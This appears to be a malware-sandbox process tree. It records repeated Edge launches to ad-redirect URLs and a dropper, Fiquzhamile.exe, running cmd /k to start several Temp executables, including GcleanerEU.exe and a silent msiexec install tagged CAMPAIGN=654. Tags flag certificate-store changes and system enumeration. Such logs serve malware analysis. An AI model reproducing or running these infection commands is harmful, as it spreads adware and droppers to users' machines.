C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46611⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xf0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968011⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46611⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Users\Admin\AppData\Local\Temp\cd-0ca50-1ee-36fa6-994474a45f036\Fiquzhamile.exe"C:\Users\Admin\AppData\Local\Temp\cd-0ca50-1ee-36fa6-994474a45f036\Fiquzhamile.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exe /eufive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\qyogue0e.iyl\GcleanerEU.exe /eufive12⤵
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 24013⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe /qn CAMPAIGN="654" & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exeC:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe /qn CAMPAIGN="654"12⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hkpubi0a.ruu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635489676 /qn CAMPAIGN=""654"" " CAMPAIGN="654"13⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exeC:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe"C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe" -u13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exe /mixfive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 50108 -s 23613⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wgkexly.ako\autosubplayer.exe /S & exit11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exe /eufive & exit11⤵
-
